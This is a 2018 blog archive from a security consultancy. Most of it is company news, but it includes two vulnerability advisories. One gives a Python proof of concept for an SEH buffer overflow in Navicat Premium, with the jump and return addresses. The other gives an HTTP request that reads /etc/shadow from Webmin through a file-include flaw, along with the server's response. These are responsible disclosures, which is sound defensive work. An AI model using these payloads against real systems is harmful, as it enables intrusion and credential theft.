Archives for 2018

Scottish SMEs and Third Sector Organisations Eligible for CE and CE Plus Vouchers

In June of this year, the Scottish Government set out their ongoing commitment to developing the Safe, Secure and Prosperous: A Cyber Resilience Strategy for Scotland. As part of this, they have made £500,000 available under the National Cyber Security Programme for a voucher scheme to support small and medium-sized private and third sector organisations in Scotland. Funding is to enable those organisations to achieve the National Cyber Security Centre (NCSC) endorsed Cyber Essentials or Cyber Essentials Plus certificate.

Organisations can apply for the grant funding online and if approved will be eligible to access the money once they have achieved the Cyber Essentials accreditation. As an independent technical information assurance consultancy, 7 Elements is well placed to support your organisation through the process of gaining Cyber Essentials certification. All of our staff are highly technical and therefore our Cyber Essentials assessors are well qualified to assist you through the process. More information on the Cyber Essentials process can be found here: https://www.7elements.co.uk/services/cyber-essentials/

As of today (7th November 2018), the scheme is live and you can apply for your voucher of up to £1000 to achieve Cyber Essentials certification. The scheme will run for 12 months or until the vouchers have been exhausted.

Scotland based small and medium-sized private sector organisations can apply via a portal on the Scottish Enterprise website below:
https://www.scottish-enterprise.com/

Third sector organisations can apply via a portal on the Scottish Council Voluntary Organisations (SCVO) website below:
https://scvo.org.uk/digital/

Best Customer Experience Award Nomination 2018

We are thrilled to have been nominated for the ‘Best Customer Experience’ award at the 2018 Scottish Cyber Awards!

The Scottish Cyber Awards are back for their third year, and we are delighted to have been nominated for the ‘Best Customer Experience’ award. This nomination means even more to us because all recommendations are from end-users that had directly utilised the services of a Scottish based cyber security organisation, which is a massive honour. We are delighted to be in such good company with Quorum Cyber and Seric Systems.

The customer experience award aims to credit organisations who are dedicated to providing outstanding service. Companies who have gone over and above what is expected to offer excellent service and act as a standard for organisations across the industry to aim for over the coming year (SBRC 2018).

David and his team are customer experience wizards – whenever I need their services, they’re there. Dependable, adaptive, clear and reliable. On all the engagements I’ve worked on with 7 Elements I’ve been impressed by David and his team’s responsiveness and capabilities. Genuine passion for the area rather than being sales driven. This goes a long way with me and I’ll keep going back to them on this basis. – 7 Elements Nomination

The winner of this award will be decided via public vote and we hope that we can rely on yours! Voting closes on the 30th October and you can place your votes here:

https://www.scottishcyberawards.co.uk

The winner will be announced at the awards dinner on the 28th November at the Sheraton Hotel.

ZoneFox Collaboration

We are excited to announce our recent partnership with ZoneFox, to enhance our award winning Incident Response Service.

At 7 Elements we work with clients across the globe, providing expertise in technical information assurance. We use an event-driven approach to Incident Response encompassing five key stages: situational awareness; establishing response parameters; resource deployment; establishing compromise zone and incident classification; followed by incident containment and remediation.

To enhance our situational awareness capability we have partnered with ZoneFox and will be able to deploy the ZoneFox agent as part of our initial response activity.

The ZoneFox solution monitors user behaviour and data movement both on-and-off-network, alerting against malicious or anomalous behaviour. This is achieved through user and entity behaviour analytics (UEBA) and intelligent machine-learning technology that provides 360 visibility across the network and beyond.

Jamie Graves, CEO, ZoneFox said: “Through our work with clients it is becoming increasingly clear that the majority are now using the platform as a cornerstone of their Incident Response strategy. The data and evidence the platform delivers to the business makes it easy to pinpoint vulnerabilities and devise a remediation plan. We’re delighted to be working with 7 Elements and this is definitely an area of the business we will be looking to grow.”

Threat Hunting

The sides from ‘Threat Hunting in the O365 Ecosystem’ given at the International Conference on Big Data in Cyber Security are now online and can be found here:

.

The video of the talk can be found here:

Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite) Vulnerability

Advisory Information

Title: Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite)

Date Published: 01/05/2018

Advisory Summary

Inputting an excessively long string of characters into the ‘host’ field when creating a new Oracle connection causes the program to crash. A lack of address space layout randomisation (ASLR) enabled within the software allows an attacker to reliably hijack the execution flow of the application.

Vendor

PremiumSoft CyberTech Ltd

Affected Software

Product Version
NaviCat Premium <= 12.0.26

Description of Issue

A buffer overflow vulnerability was discovered in NaviCat Premium version 12.0.26. This vulnerability was found in the “New Connection” component of the application. Entering an excessively long string into the host field of a new Oracle connection will cause the program to crash. This crash, combined with a lack of ASLR enabled within the application, allows an attacker to overwrite the structured exception handler (SEH) and hijack execution flow of the application. This issue was tested on a 32-bit Windows 7 host.

PoC

The following proof of concept python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of navicatPOC.txt and paste into the host field of a new Oracle connection. Test the connection to trigger the crash



#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 01/05/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.
 
 
# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. 
filename="navicatPOC.txt"
junk = "A" * 1502
#nseh = "\x4C\x4C\x77\x04"
#seh= "\x75\x2a\x01\x10"
nseh = "B" * 4
seh = "C" * 4
fill = "D" * 4000
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

This will result an SEH overwrite, as demonstrated by the following screenshot:

SEH Overwrite
 

From here, we can replace SEH with POP POP RET instructions, located at 10012a75:

seh= "\x75\x2a\x01\x10"

And replace nSEH with the following code to jump to our payload:

nseh = "\x4C\x4C\x77\x04"

Which will land at the payload, represented in the proof of concept as the character ‘D’ (\x44).

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Navicat Professional can be found on the Navicat website.

Timeline

Advisory sent – 4th April 2018

Requested confirmation that advisory has been recieved by Navicat – 9th April 2018

Confirmation of the issue by Navicat – 9th April 2018

Patch released by Navicat – 26th April 2018

Advisory published by 7 Elements – 1st May 2018

DL100 Cyber Resilience Innovation of the Year

7 Elements shortlisted in DL100 Cyber Resilience Innovation of the Year category for second year!

7 Elements are delighted that our Incident Response Partnership has been shortlisted for the second year in a row in the DL100 Cyber Resilience Innovation of the Year category. We are very proud of our incident response service and are excited by the external recognition we are gaining from our peers!

What makes our approach different? In short, no up-front costs and establishing a robust partnership model that delivers when needed. Our partnership clients only ever pay for effort that they use and based on agreed upfront costs, so that there are no unwelcome surprises.

David Stubley, CEO 7 Elements

Positive and robust cyber resilience is now a fundamental business enabler. The ability of organised criminal gangs and motivated attackers to target organisations via the Internet has increased to a level where they are capable of executing attacks with little financial outlay, that can result in huge financial gain for them, while causing both financial loss and reputational damage for the targeted organisation. Even non-targeted attacks can have catastrophic consequences and result in down time and financial loss. Having a robust approach to incident response that is both flexible and proportional is now a key requirement for any organisation doing business online. Our incident response partnership is designed to give SME’s access to the same level of incident response services as Blue-chip companies without the high costs.

Recent feedback from one of our clients dealing with a breach that resulted in financial loss:

We engaged 7 Elements to help us while dealing with a recent security issue. We found them to be extremely responsive and able to present their findings with real clarity, together with a comprehensive step by step plan. Which on implementation, allowed us to give confidence to our Board and shareholders that the issues were not only understood but that all measures had been taken to ensure that there would be no repeat in future. We would recommend anyone not to rely solely on their IT provider, but to obtain advice on security from an expert, as prevention is the best cure and compromising on cybersecurity can prove extremely costly. We continue to work with David and his team at 7 Elements and cannot recommend them highly enough.

CFO, Commercial Property Developer

 

If you would like to know more and get on the front foot when dealing with cyber security incidents, then get in touch with the team.

As of the 12th April 2018, voting has now opened for each of the DL100 categories and we would like to take this opportunity to ask for your vote.

The DL100 winners will be announced at the awards dinner on the 21st June at the Sheraton Grand in London.

 

More information on our Incident Response Partnership can be found here.

International Conference of Big Data in Cyber Security

International Conference of Big Data in Cyber Security

Our CEO, David Stubley will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Secure Incident Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase a good practice in industry and network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.

Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files using Local File Include

Advisory Information

Title:Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files Using Local File Include

Date Published: 14/03/2018

Advisory Summary

The application allows a restricted Linux user to obtain arbitrary local system files via a Local File Include vulnerability.

Vendor

Webmin

Affected Software

Product Version
Webmin 1.840 & 1.880

Description of Issue

Unix server users who are otherwise restricted from reading root level or system files are granted permission to read system level or root only files in a default installation of Webmin 1.840/1.880 server. As a result of weak default configuration settings, limited users have full access rights to the underlying Unix system files, allowing the user to read sensitive data from the local system such as ‘/etc/shadow’.

PoC

The following GET request shows the use of a direct URL to obtain local files through the Local File Include vulnerability:




GET /syslog/save_log.cgi?view=1&file=/etc/shadow HTTP/1.1

Host: 192.168.75.150:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

The Webmin application server responds with a ‘200 OK’ and includes the file normally restricted to limited users of the system:




HTTP/1.0 200 Document follows

Date: Thu, 8 Mar 2018 20:41:28 GMT

Server: MiniServ/1.880

Connection: close

proxy:*:17288:0:99999:7:::
www-data:*:17288:0:99999:7:::
mysql:!:17542:0:99999:7:::
opsview:!:17542::::::
nagios:!:17542::::::
snmp:*:17542:0:99999:7:::
admin:$1$**SNIP**/5sl29PP0a.:17542:0:99999:7:::


The following screenshot shows the web view display of the file loaded:

Webmin default configuration

A number of settings exist within the Webmin Administrator control panel to restrict users from accessing sensitive system files. However, by default, these settings are not enforced when a new installation of Webmin 1.840/1.880 is deployed within an environment. Of specific note would be the setting that enables all files to be viewed as a log file. The default setting within the Webmin server for this is set to ‘yes’. This allows the restricted user to load sensitive system files via the Local File Include function of the web application.

Remediation

The issue has not been patched yet.

Workaround

Administrators of Webmin server should manually set the following access control options within the configuration to further protect sensitive system files from being read by otherwise restricted users.

Webmin > Webmin Users > Webmin Groups > Select Group  > Available Webmin Modules > System Logs

  •       Can view any files as a log? – ‘No’

 

Timeline

  • Initial email contact to vendor via security email address noted on website – 8th March 2018.

  • Email reply from Webmin explaining that Webmin users have root-equivalent access to the underlying system. Also, to advise to restrict the directory in which users have access to via Webmin – 9th March 2018.

  • Email reply to Webmin to advise that such measures explained in previous reply, do not limit access to restricted files with a walkthrough of the issue in easier steps – 9th March 2018.

  • Further email to Webmin to explain that only one setting “Can view any file as a log” is the only setting that prohibits restricted users from viewing arbitrary files via Webmin – 9th March 2018.

  • Additional email to Webmin to explain the ‘referer_none=1’ default setting which prohibits access on default installations of Webmin can be bypassed using the Referer HTTP Header – 9th March 2018.

  • Email reply from Webmin explaining that it is correct that the setting “Can view any files as a log” will prohibit user access to sensitive files – 9th March 2018.

  • Email to Webmin to explain that the issue exists in version 1.880 and the it is advisable to set the default configuration of Webmin to restrict the setting “Can view any file as a log” and that a blog post will be made available to the wider community informing them of the issue to further protect system administrators of arbitrary file access to the system – 10th March 2018.

  • Reply from Webmin to agree that permissions in Webmin are different to what you would expect from Linux and that a blog post would be useful – 11th March 2018.

  • Advisory Released – 14th March 2018